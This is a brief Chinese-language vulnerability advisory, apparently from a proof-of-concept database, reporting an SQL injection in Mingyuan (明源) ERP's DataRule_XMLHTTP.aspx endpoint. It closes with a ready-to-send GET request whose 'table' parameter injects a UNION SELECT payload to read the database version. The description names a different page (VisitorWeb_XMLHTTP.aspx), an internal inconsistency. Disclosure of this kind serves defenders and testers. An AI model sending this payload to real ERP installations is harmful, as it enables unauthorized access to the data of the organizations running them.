明源ERP DataRule_XMLHTTP 存在SQL注入漏洞

日期: 2025-07-18 | 影响软件: HTTP | POC: 已公开

漏洞描述

明源ERP VisitorWeb_XMLHTTP.aspx 存在SQL注入漏洞，攻击者进而利用此漏洞获取数据库敏感信息。

GET /BUAdjust/DataRule/DataRule_XMLHTTP.aspx/?ywtype=getFieldXML&table=-1%27%20union%20select%20@@version-- HTTP/1.1